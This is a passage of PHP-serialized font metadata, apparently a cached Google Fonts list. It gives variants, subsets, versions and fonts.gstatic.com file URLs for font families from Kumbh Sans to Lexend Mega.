Sans\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:93:\"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNorqSyNIXIwSP0XD.ttf\";s:3:\"200\";s:93:\"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNopqSiNIXIwSP0XD.ttf\";s:3:\"300\";s:93:\"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNoq0SiNIXIwSP0XD.ttf\";s:7:\"regular\";s:93:\"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNorqSiNIXIwSP0XD.ttf\";s:3:\"500\";s:93:\"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNorYSiNIXIwSP0XD.ttf\";s:3:\"600\";s:93:\"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNoo0TSNIXIwSP0XD.ttf\";s:3:\"700\";s:93:\"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNooNTSNIXIwSP0XD.ttf\";s:3:\"800\";s:93:\"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNopqTSNIXIwSP0XD.ttf\";s:3:\"900\";s:93:\"http://fonts.gstatic.com/s/kumbhsans/v12/c4mw1n92AsfhuCq6tVsaoIx1CHIi4kToNopDTSNIXIwSP0XD.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:630;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Kurale\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:10:\"devanagari\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/kurale/v11/4iCs6KV9e9dXjho6eAT3v02QFg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:631;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"La Belle Aurore\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/labelleaurore/v16/RrQIbot8-mNYKnGNDkWlocovHeIIG-eFNVmULg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:632;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Lacquer\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/lacquer/v15/EYqzma1QwqpG4_BBB7-AXhttQ5I.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:633;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Laila\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:69:\"http://fonts.gstatic.com/s/laila/v13/LYjBdG_8nE8jDLzxogNAh14nVcfe.ttf\";s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/laila/v13/LYjMdG_8nE8jDIRdiidIrEIu.ttf\";s:3:\"500\";s:69:\"http://fonts.gstatic.com/s/laila/v13/LYjBdG_8nE8jDLypowNAh14nVcfe.ttf\";s:3:\"600\";s:69:\"http://fonts.gstatic.com/s/laila/v13/LYjBdG_8nE8jDLyFpANAh14nVcfe.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/laila/v13/LYjBdG_8nE8jDLzhpQNAh14nVcfe.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:634;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Lakki Reddy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:6:\"telugu\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/lakkireddy/v19/S6u5w49MUSzD9jlCPmvLZQfox9k97-xZ.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:635;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Lalezar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/lalezar/v14/zrfl0HLVx-HwTP82UaDyIiL0RCg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:636;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Lancelot\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/lancelot/v22/J7acnppxBGtQEulG4JY4xJ9CGyAa.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:637;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Langar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"gurmukhi\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/langar/v26/kJEyBukW7AIlgjGVrTVZ99sqrQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:638;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Lateef\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/lateef/v23/hESw6XVnNCxEvkbMpheEZo_H_w.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:639;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Lato\";s:8:\"variants\";a:10:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"900\";i:9;s:9:\"900italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":10:{s:3:\"100\";s:66:\"http://fonts.gstatic.com/s/lato/v23/S6u8w4BMUTPHh30wWyWrFCbw7A.ttf\";s:9:\"100italic\";s:68:\"http://fonts.gstatic.com/s/lato/v23/S6u-w4BMUTPHjxsIPy-vNiPg7MU0.ttf\";s:3:\"300\";s:67:\"http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USew-FGC_p9dw.ttf\";s:9:\"300italic\";s:70:\"http://fonts.gstatic.com/s/lato/v23/S6u_w4BMUTPHjxsI9w2PHA3s5dwt7w.ttf\";s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHvxk6XweuBCY.ttf\";s:6:\"italic\";s:66:\"http://fonts.gstatic.com/s/lato/v23/S6u8w4BMUTPHjxswWyWrFCbw7A.ttf\";s:3:\"700\";s:67:\"http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh6UVew-FGC_p9dw.ttf\";s:9:\"700italic\";s:70:\"http://fonts.gstatic.com/s/lato/v23/S6u_w4BMUTPHjxsI5wqPHA3s5dwt7w.ttf\";s:3:\"900\";s:67:\"http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50Xew-FGC_p9dw.ttf\";s:9:\"900italic\";s:70:\"http://fonts.gstatic.com/s/lato/v23/S6u_w4BMUTPHjxsI3wiPHA3s5dwt7w.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:640;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Lavishly Yours\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/lavishlyyours/v2/jizDREVIvGwH5OjiZmX9r5z_WxUY0TY7ikbI.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:641;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"League Gothic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:99:\"http://fonts.gstatic.com/s/leaguegothic/v6/qFdR35CBi4tvBz81xy7WG7ep-BQAY7Krj7feObpH_-amidQ6Q9hn.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:642;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"League Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/leaguescript/v24/CSR54zpSlumSWj9CGVsoBZdeaNNUuOwkC2s.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:643;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"League Spartan\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:102:\"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvM_oXpBMdcFguczA.ttf\";s:3:\"200\";s:102:\"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvMfoTpBMdcFguczA.ttf\";s:3:\"300\";s:102:\"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvMoITpBMdcFguczA.ttf\";s:7:\"regular\";s:102:\"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvM_oTpBMdcFguczA.ttf\";s:3:\"500\";s:102:\"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvMzITpBMdcFguczA.ttf\";s:3:\"600\";s:102:\"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvMIIPpBMdcFguczA.ttf\";s:3:\"700\";s:102:\"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvMGYPpBMdcFguczA.ttf\";s:3:\"800\";s:102:\"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvMfoPpBMdcFguczA.ttf\";s:3:\"900\";s:102:\"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvMV4PpBMdcFguczA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:644;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Leckerli One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/leckerlione/v16/V8mCoQH8VCsNttEnxnGQ-1itLZxcBtItFw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:645;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Ledger\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/ledger/v16/j8_q6-HK1L3if_sxm8DwHTBhHw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:646;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Lekton\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/lekton/v17/SZc43FDmLaWmWpBeXxfonUPL6Q.ttf\";s:6:\"italic\";s:70:\"http://fonts.gstatic.com/s/lekton/v17/SZc63FDmLaWmWpBuXR3sv0bb6StO.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/lekton/v17/SZc73FDmLaWmWpBm4zjMlWjX4DJXgQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:647;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Lemon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/lemon/v14/HI_EiYEVKqRMq0jBSZXAQ4-d.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:648;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Lemonada\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:90:\"http://fonts.gstatic.com/s/lemonada/v20/0QI-MXFD9oygTWy_R-FFlwV-bgfR7QJGJOt2mfWc3Z2pTg.ttf\";s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/lemonada/v20/0QI-MXFD9oygTWy_R-FFlwV-bgfR7QJGeut2mfWc3Z2pTg.ttf\";s:3:\"500\";s:90:\"http://fonts.gstatic.com/s/lemonada/v20/0QI-MXFD9oygTWy_R-FFlwV-bgfR7QJGSOt2mfWc3Z2pTg.ttf\";s:3:\"600\";s:90:\"http://fonts.gstatic.com/s/lemonada/v20/0QI-MXFD9oygTWy_R-FFlwV-bgfR7QJGpOx2mfWc3Z2pTg.ttf\";s:3:\"700\";s:90:\"http://fonts.gstatic.com/s/lemonada/v20/0QI-MXFD9oygTWy_R-FFlwV-bgfR7QJGnex2mfWc3Z2pTg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:649;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Lexend\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:85:\"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WCzsX_LBte6KuGEo.ttf\";s:3:\"200\";s:85:\"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WC7sW_LBte6KuGEo.ttf\";s:3:\"300\";s:85:\"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WC2UW_LBte6KuGEo.ttf\";s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WCzsW_LBte6KuGEo.ttf\";s:3:\"500\";s:85:\"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WCwkW_LBte6KuGEo.ttf\";s:3:\"600\";s:85:\"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WC-UR_LBte6KuGEo.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WC9wR_LBte6KuGEo.ttf\";s:3:\"800\";s:85:\"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WC7sR_LBte6KuGEo.ttf\";s:3:\"900\";s:85:\"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WC5IR_LBte6KuGEo.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:650;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Lexend Deca\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:96:\"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U48MxArBPCqLNflg.ttf\";s:3:\"200\";s:96:\"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U4cM1ArBPCqLNflg.ttf\";s:3:\"300\";s:96:\"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U4rs1ArBPCqLNflg.ttf\";s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U48M1ArBPCqLNflg.ttf\";s:3:\"500\";s:96:\"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U4ws1ArBPCqLNflg.ttf\";s:3:\"600\";s:96:\"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U4LspArBPCqLNflg.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U4F8pArBPCqLNflg.ttf\";s:3:\"800\";s:96:\"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U4cMpArBPCqLNflg.ttf\";s:3:\"900\";s:96:\"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U4WcpArBPCqLNflg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:651;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Lexend Exa\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:93:\"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9r7T6bHHJ8BRq0b.ttf\";s:3:\"200\";s:93:\"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9p7TqbHHJ8BRq0b.ttf\";s:3:\"300\";s:93:\"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9qlTqbHHJ8BRq0b.ttf\";s:7:\"regular\";s:93:\"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9r7TqbHHJ8BRq0b.ttf\";s:3:\"500\";s:93:\"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9rJTqbHHJ8BRq0b.ttf\";s:3:\"600\";s:93:\"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9olSabHHJ8BRq0b.ttf\";s:3:\"700\";s:93:\"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9ocSabHHJ8BRq0b.ttf\";s:3:\"800\";s:93:\"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9p7SabHHJ8BRq0b.ttf\";s:3:\"900\";s:93:\"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9pSSabHHJ8BRq0b.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:652;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Lexend Giga\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:96:\"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRC2LmE68oo6eepYQ.ttf\";s:3:\"200\";s:96:\"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRCWLiE68oo6eepYQ.ttf\";s:3:\"300\";s:96:\"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRChriE68oo6eepYQ.ttf\";s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRC2LiE68oo6eepYQ.ttf\";s:3:\"500\";s:96:\"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRC6riE68oo6eepYQ.ttf\";s:3:\"600\";s:96:\"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRCBr-E68oo6eepYQ.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRCP7-E68oo6eepYQ.ttf\";s:3:\"800\";s:96:\"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRCWL-E68oo6eepYQ.ttf\";s:3:\"900\";s:96:\"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRCcb-E68oo6eepYQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:653;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Lexend Mega\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:96:\"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDL8fivveyiq9EqQw.ttf\";s:3:\"200\";s:96:\"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDLcfmvveyiq9EqQw.ttf\";s:3:\"300\";s:96:\"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDLr_mvveyiq9EqQw.ttf\";s:7:\"regular\";s: